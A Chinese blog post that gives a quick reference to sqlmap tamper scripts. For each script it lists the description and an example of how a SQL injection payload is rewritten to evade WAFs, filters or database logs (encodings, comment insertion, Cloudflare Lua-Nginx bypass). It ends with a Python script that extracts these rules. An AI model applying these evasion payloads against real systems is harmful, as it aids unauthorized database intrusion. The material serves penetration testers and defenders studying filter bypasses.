sqlmap tamper规则速查

Sqlmap Tamper规则提取:

写了个小脚本从sqlmap的tamper的文件里把替换规则提取出来,方便查阅

0x2char.py:

Replaces each (MySQL) 0x<hex> encoded string with equivalent CONCAT(CHAR(),...) counterpart
>>> tamper('SELECT 0xdeadbeef')
    'SELECT CONCAT(CHAR(222),CHAR(173),CHAR(190),CHAR(239))'

apostrophemask.py:

Replaces apostrophe character (') with its UTF-8 full width counterpart (e.g. ' -> %EF%BC%87)
>>> tamper("1 AND '1'='1")
    '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'

apostrophenullencode.py:

Replaces apostrophe character (') with its illegal double unicode counterpart (e.g. ' -> %00%27)
>>> tamper("1 AND '1'='1")
    '1 AND %00%271%00%27=%00%271'

appendnullbyte.py:

Appends (Access) NULL byte character (%00) at the end of payload
>>> tamper('1 AND 1=1')
    '1 AND 1=1%00'

base64encode.py:

Base64-encodes all characters in a given payload
>>> tamper("1' AND SLEEP(5)#")
    'MScgQU5EIFNMRUVQKDUpIw=='

between.py:

Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' and equals operator ('=') with 'BETWEEN # AND #'
>>> tamper('1 AND A > B--')
    '1 AND A NOT BETWEEN 0 AND B--'
>>> tamper('1 AND A = B--')
    '1 AND A BETWEEN B AND B--'

bluecoat.py:

Replaces space character after SQL statement with a valid random blank character. Afterwards replace character '=' with operator LIKE
>>> tamper('SELECT id FROM users WHERE id = 1')
    'SELECT%09id FROM%09users WHERE%09id LIKE 1'

chardoubleencode.py:

Double URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %2553%2545%254C%2545%2543%2554)
>>> tamper('SELECT FIELD FROM%20TABLE')
    '%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545'

charencode.py:

URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %53%45%4C%45%43%54)
>>> tamper('SELECT FIELD FROM%20TABLE')
    '%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45'

charunicodeencode.py:

Unicode-URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %u0053%u0045%u004C%u0045%u0043%u0054)
>>> tamper('SELECT FIELD%20FROM TABLE')
    '%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045'

charunicodeescape.py:

Unicode-escapes non-encoded characters in a given payload (not processing already encoded) (e.g. SELECT -> \u0053\u0045\u004C\u0045\u0043\u0054)
>>> tamper('SELECT FIELD FROM TABLE')
    '\\\\u0053\\\\u0045\\\\u004C\\\\u0045\\\\u0043\\\\u0054\\\\u0020\\\\u0046\\\\u0049\\\\u0045\\\\u004C\\\\u0044\\\\u0020\\\\u0046\\\\u0052\\\\u004F\\\\u004D\\\\u0020\\\\u0054\\\\u0041\\\\u0042\\\\u004C\\\\u0045'

commalesslimit.py:

Replaces (MySQL) instances like 'LIMIT M, N' with 'LIMIT N OFFSET M' counterpart
>>> tamper('LIMIT 2, 3')
    'LIMIT 3 OFFSET 2'

commalessmid.py:

Replaces (MySQL) instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)' counterpart
>>> tamper('MID(VERSION(), 1, 1)')
    'MID(VERSION() FROM 1 FOR 1)'

commentbeforeparentheses.py:

Prepends (inline) comment before parentheses (e.g. ( -> /**/()
>>> tamper('SELECT ABS(1)')
    'SELECT ABS/**/(1)'

concat2concatws.py:

Replaces (MySQL) instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)' counterpart
>>> tamper('CONCAT(1,2)')
    'CONCAT_WS(MID(CHAR(0),0,0),1,2)'

equaltolike.py:

Replaces all occurrences of operator equal ('=') with 'LIKE' counterpart
>>> tamper('SELECT * FROM users WHERE id=1')
    'SELECT * FROM users WHERE id LIKE 1'

escapequotes.py:

Slash escape single and double quotes (e.g. ' -> \')
>>> tamper('1" AND SLEEP(5)#')
    '1\\\\" AND SLEEP(5)#'

greatest.py:

Replaces greater than operator ('>') with 'GREATEST' counterpart
>>> tamper('1 AND A > B')
    '1 AND GREATEST(A,B+1)=A'

halfversionedmorekeywords.py:

Adds (MySQL) versioned comment before each keyword
>>> tamper("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa")
    "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"

htmlencode.py:

HTML encode (using code points) all non-alphanumeric characters (e.g. ' -> &#39;)
>>> tamper("1' AND SLEEP(5)#")
    '1&#39;&#32;AND&#32;SLEEP&#40;5&#41;&#35;'

ifnull2casewhenisnull.py:

Replaces instances like 'IFNULL(A, B)' with 'CASE WHEN ISNULL(A) THEN (B) ELSE (A) END' counterpart
>>> tamper('IFNULL(1, 2)')
    'CASE WHEN ISNULL(1) THEN (2) ELSE (1) END'

ifnull2ifisnull.py:

Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)' counterpart
>>> tamper('IFNULL(1, 2)')
    'IF(ISNULL(1),2,1)'

informationschemacomment.py:

Add an inline comment (/**/) to the end of all occurrences of (MySQL) "information_schema" identifier
>>> tamper('SELECT table_name FROM INFORMATION_SCHEMA.TABLES')
    'SELECT table_name FROM INFORMATION_SCHEMA/**/.TABLES'

least.py:

Replaces greater than operator ('>') with 'LEAST' counterpart
>>> tamper('1 AND A > B')
    '1 AND LEAST(A,B+1)=B+1'

lowercase.py:

Replaces each keyword character with lower case value (e.g. SELECT -> select)
>>> tamper('INSERT')
    'insert'

luanginx.py:

LUA-Nginx WAFs Bypass (e.g. Cloudflare)
>>> random.seed(0); hints={}; payload = tamper("1 AND 2>1", hints=hints); "%s&%s" % (hints[HINT.PREPEND], payload)
    '0U=&Aq=&Fz=&Ws=&DK=&4F=&rU=&Mp=&48=&Y3=&tT=&3Q=&Dg=&AL=&47=&D1=&qX=&Ia=&Sy=&ZP=&aE=&1p=&u1=&lJ=&o7=&XB=&et=&F5=&gI=&RH=&YH=&7L=&KB=&Kx=&Js=&lL=&OD=&fU=&25=&03=&5H=&yR=&rY=&03=&K6=&JB=&O9=&4X=&fL=&EN=&0p=&Th=&nX=&uY=&gj=&Rc=&J4=&HQ=&bN=&LJ=&yw=&8c=&b7=&lh=&nX=&6b=&Ag=&qn=&Ov=&lF=&cg=&9m=&wT=&Z4=&kP=&7d=&P0=&vp=&LB=&kD=&zJ=&Ft=&wZ=&pI=&aT=&uc=&ro=&7v=&rw=&6N=&MS=&yz=&Oa=&lu=&oN=&x2=&Jz=&yR=&zP=&cB=&qj=&GE=&IU=&2E=&tC=&Y2=&Yl=&9N=&fS=&9y=&Qt=&nS=&aZ=&Gg=&hO=&2r=&8g=&0y=&fr=&CX=&1i=&GO=&v2=&rb=&cQ=&I6=&64=&cU=&RO=&S3=&Nx=&Hm=&Ka=&ju=&WS=&uM=&ck=&8r=&yI=&sD=&oc=&lG=&ey=&uz=&g4=&D0=&8v=&DR=&As=&T3=&5M=&x8=&Ne=&fU=&da=&yG=&BE=&KQ=&Aw=&9q=&WA=&wd=&1R=&3B=&Ph=&ym=&c6=&nj=&mx=&Hj=&98=&jz=&Q2=&E4=&tE=&EP=&mL=&nv=&73=&Yc=&jp=&W0=&KS=&Ye=&f1=&cn=&ca=&0u=&jO=&8F=&3F=&JQ=&XU=&9U=&4m=&HL=&ZD=&Xy=&K0=&XO=&al=&Fp=&e1=&6s=&zY=&dN=&hr=&Zd=&cz=&E1=&SP=&j9=&zL=&xc=&Dj=&cM=&Ng=&Iv=&xW=&E2=&LC=&Nu=&hQ=&MW=&h4=&X4=&2Q=&YG=&Wl=&WB=&UC=&We=&c5=&E3=&6P=&Jn=&fY=&3W=&RA=&sh=&AJ=&56=&zg=&VT=&bB=&Qb=&47=&Se=&ew=&bv=&a8=&Ye=&3m=&mP=&6h=&aw=&bL=&1l=&gv=&7i=&7w=&Ds=&67=&Nl=&9g=&Kj=&36=&Xt=&pU=&sA=&ci=&be=&eA=&IT=&iA=&Nf=&Bw=&6d=&zT=&tm=&sD=&6X=&rI=&QX=&By=&VA=&pC=&6i=&CN=&Dm=&aR=&Ma=&sV=&MH=&jR=&DQ=&Vo=&Vr=&9h=&2c=&pG=&Ky=&gp=&rU=&4K=&cX=&sv=&Gp=&5k=&zr=&GJ=&MG=&zN=&zW=&Ws=&xM=&jR=&xK=&iP=&vD=&zD=&Rt=&Od=&sU=&dM=&bD=&3a=&Ge=&1Q=&UP=&ac=&M9=&2R=&To=&Ur=&gC=&uk=&A3=&AB=&RG=&i4=&BW=&yY=&yn=&m6=&Kd=&yo=&fl=&dN=&kL=&LR=&Fr=&2v=&CN=&F7=&75=&5K=&ER=&nq=&ck=&aO=&iW=&Q8=&y5=&Cv=&g2=&Xu=&Cu=&bc=&wm=&Gl=&mP=&Tt=&1p=&vS=&c5=&eC=&Sc=&Y8=&Ch=&fg=&Vz=&4B=&eA=&UZ=&cl=&Eh=&25=&tA=&Ir=&Hm=&sB=&LH=&qo=&hW=&gT=&pr=&TO=&TF=&1h=&Oh=&Tw=&PR=&On=&Zo=&GP=&oM=&rk=&YI=&uK=&bi=&y8=&Fe=&VW=&WJ=&Rn=&TY=&Vv=&KM=&3g=&ZG=&wC=&an=&OE=&7D=&t0=&qL=&RY=&Wx=&dc=&T7=&vB=&SO=&qP=&sw=&HT=&jb=&Mb=&cn=&Oe=&d8=&A3=&nA=&wk=&u9=&Ux=&zq=&GT=&QC=&c5=&zy=&ai=&1F=&Tj=&u0=&Yp=&bY=&kW=&Qk=&e5=&LM=&Cj=&Lp=&XT=&b5=&cf=&sj=&ow=&Tz=&qE=&yt=&3I=&8V=&Jq=&QC=&Sz=&Eb=&Tc=&QK=&Wr=&Qm=&Gv=&8m=&Ju=&85=&KS=&Qv=&43=&uU=&aY=&J7=&wM=&uW=&L9=&ai=&ch=&56=&D6=&YW=&Ul=&1 AND 2>1'

modsecurityversioned.py:

Embraces complete query with (MySQL) versioned comment
>>> import random
    >>> random.seed(0)
>>> tamper('1 AND 2>1--')
    '1 /*!30874AND 2>1*/--'

modsecurityzeroversioned.py:

Embraces complete query with (MySQL) zero-versioned comment
>>> tamper('1 AND 2>1--')
    '1 /*!00000AND 2>1*/--'

multiplespaces.py:

Adds multiple spaces (' ') around SQL keywords
>>> random.seed(0)
    >>> tamper('1 UNION SELECT foobar')

overlongutf8.py:

Converts all (non-alphanum) characters in a given payload to overlong UTF8 (not processing already encoded) (e.g. ' -> %C0%A7)
>>> tamper('SELECT FIELD FROM TABLE WHERE 2>1')
    'SELECT%C0%A0FIELD%C0%A0FROM%C0%A0TABLE%C0%A0WHERE%C0%A02%C0%BE1'

overlongutf8more.py:

Converts all characters in a given payload to overlong UTF8 (not processing already encoded) (e.g. SELECT -> %C1%93%C1%85%C1%8C%C1%85%C1%83%C1%94)
>>> tamper('SELECT FIELD FROM TABLE WHERE 2>1')
    '%C1%93%C1%85%C1%8C%C1%85%C1%83%C1%94%C0%A0%C1%86%C1%89%C1%85%C1%8C%C1%84%C0%A0%C1%86%C1%92%C1%8F%C1%8D%C0%A0%C1%94%C1%81%C1%82%C1%8C%C1%85%C0%A0%C1%97%C1%88%C1%85%C1%92%C1%85%C0%A0%C0%B2%C0%BE%C0%B1'

percentage.py:

Adds a percentage sign ('%') infront of each character (e.g. SELECT -> %S%E%L%E%C%T)
>>> tamper('SELECT FIELD FROM TABLE')
    '%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E'

plus2concat.py:

Replaces plus operator ('+') with (MsSQL) function CONCAT() counterpart
>>> tamper('SELECT CHAR(113)+CHAR(114)+CHAR(115) FROM DUAL')
    'SELECT CONCAT(CHAR(113),CHAR(114),CHAR(115)) FROM DUAL'

>>> tamper('SELECT (CHAR(113)+CHAR(114)+CHAR(115)) FROM DUAL')
    'SELECT CONCAT(CHAR(113),CHAR(114),CHAR(115)) FROM DUAL'

plus2fnconcat.py:

Replaces plus operator ('+') with (MsSQL) ODBC function {fn CONCAT()} counterpart
>>> tamper('SELECT CHAR(113)+CHAR(114)+CHAR(115) FROM DUAL')
    'SELECT {fn CONCAT({fn CONCAT(CHAR(113),CHAR(114))},CHAR(115))} FROM DUAL'
>>> tamper('SELECT (CHAR(113)+CHAR(114)+CHAR(115)) FROM DUAL')
    'SELECT {fn CONCAT({fn CONCAT(CHAR(113),CHAR(114))},CHAR(115))} FROM DUAL'

randomcase.py:

Replaces each keyword character with random case value (e.g. SELECT -> SEleCt)
>>> import random
>>> random.seed(0)
>>> tamper('INSERT')
    'INseRt'

randomcomments.py:

Add random inline comments inside SQL keywords (e.g. SELECT -> S/**/E/**/LECT)
>>> import random
    >>> random.seed(0)
>>> tamper('INSERT')
    'I/**/N/**/SERT'

space2comment.py:

Replaces space character (' ') with comments '/**/'
>>> tamper('SELECT id FROM users')
    'SELECT/**/id/**/FROM/**/users'

space2dash.py:

Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n')
>>> random.seed(0)
    >>> tamper('1 AND 9227=9227')

space2hash.py:

Replaces (MySQL) instances of space character (' ') with a pound character ('#') followed by a random string and a new line ('\n')
>>> random.seed(0)
    >>> tamper('1 AND 9227=9227')

space2morecomment.py:

Replaces (MySQL) instances of space character (' ') with comments '/**_**/'
>>> tamper('SELECT id FROM users')
    'SELECT/**_**/id/**_**/FROM/**_**/users'

space2morehash.py:

Replaces (MySQL) instances of space character (' ') with a pound character ('#') followed by a random string and a new line ('\n')
>>> random.seed(0)
    >>> tamper('1 AND 9227=9227')

space2mssqlblank.py:

Replaces (MsSQL) instances of space character (' ') with a random blank character from a valid set of alternate characters
>>> random.seed(0)
    >>> tamper('SELECT id FROM users')

space2mssqlhash.py:

Replaces space character (' ') with a pound character ('#') followed by a new line ('\n')
>>> tamper('1 AND 9227=9227')
    '1%23%0AAND%23%0A9227=9227'

space2mysqlblank.py:

Replaces (MySQL) instances of space character (' ') with a random blank character from a valid set of alternate characters
>>> random.seed(0)
    >>> tamper('SELECT id FROM users')

space2mysqldash.py:

Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n')
>>> tamper('1 AND 9227=9227')
    '1--%0AAND--%0A9227=9227'

space2plus.py:

Replaces space character (' ') with plus ('+')
>>> tamper('SELECT id FROM users')
    'SELECT+id+FROM+users'

space2randomblank.py:

Replaces space character (' ') with a random blank character from a valid set of alternate characters
>>> random.seed(0)
    >>> tamper('SELECT id FROM users')

sp_password.py:

Appends (MsSQL) function 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs
>>> tamper('1 AND 9227=9227-- ')
    '1 AND 9227=9227-- sp_password'

symboliclogical.py:

Replaces AND and OR logical operators with their symbolic counterparts (&& and ||)
>>> tamper("1 AND '1'='1")
    "1 %26%26 '1'='1"

unionalltounion.py:

Replaces instances of UNION ALL SELECT with UNION SELECT counterpart
>>> tamper('-1 UNION ALL SELECT')
    '-1 UNION SELECT'

unmagicquotes.py:

Replaces quote character (') with a multi-byte combo %BF%27 together with generic comment at the end (to make it work)
>>> tamper("1' AND 1=1")
    '1%bf%27-- -'

uppercase.py:

Replaces each keyword character with upper case value (e.g. select -> SELECT)
>>> tamper('insert')
    'INSERT'

varnish.py:

Appends a HTTP header 'X-originating-IP' to bypass Varnish Firewall
Examples:
>> X-forwarded-for: TARGET_CACHESERVER_IP (184.189.250.X)
>> X-remote-IP: TARGET_PROXY_IP (184.189.250.X)
>> X-originating-IP: TARGET_LOCAL_IP (127.0.0.1)
>> x-remote-addr: TARGET_INTERNALUSER_IP (192.168.1.X)
>> X-remote-IP: * or %00 or %0A

versionedkeywords.py:

Encloses each non-function keyword with (MySQL) versioned comment
>>> tamper('1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#')
    '1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#'

versionedmorekeywords.py:

Encloses each keyword with (MySQL) versioned comment
>>> tamper('1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#')
    '1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#'

xforwardedfor.py:

Append a fake HTTP header 'X-Forwarded-For'
headers = kwargs.get("headers", {})
headers["X-Forwarded-For"] = randomIP()
headers["X-Client-Ip"] = randomIP()
headers["X-Real-Ip"] = randomIP()

脚本代码:



import re
import os,sys
print ("Sqlmap Tamper规则提取:\n")
tamper_Regex=re.compile(r'>>>.+\s.+\s')
tamper_info_Regex=re.compile(r'"""\s.+')
os.chdir(sys.path[0])
path=os.getcwd()
print (path)
tamper_files=os.listdir(path)

for tamper_name in tamper_files:
    if tamper_name=="tamper.py" or tamper_name=="varnish.py" or tamper_name=="xforwardedfor.py" or tamper_name=="__init__.py":
        continue
    file=path+"\\"+tamper_name
    fo=open(file,'r')
    tamper_raw=fo.read()
    print ("### "+tamper_name+':',end='\n')
    info=tamper_info_Regex.findall(tamper_raw)
    rules=tamper_Regex.findall(tamper_raw)
    print (info[1].replace('"""',''))
    print ("```")
    print (rules[0])
    try:
        print (rules[1])
    except:
        pass
    print ("```")
    fo.close

本博客采用 知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议(CC BY-NC-SA 4.0) 发布.转载请注明出处
本文链接:https://ares-x.com/2019/05/01/sqlmap-规则tamper规则速查/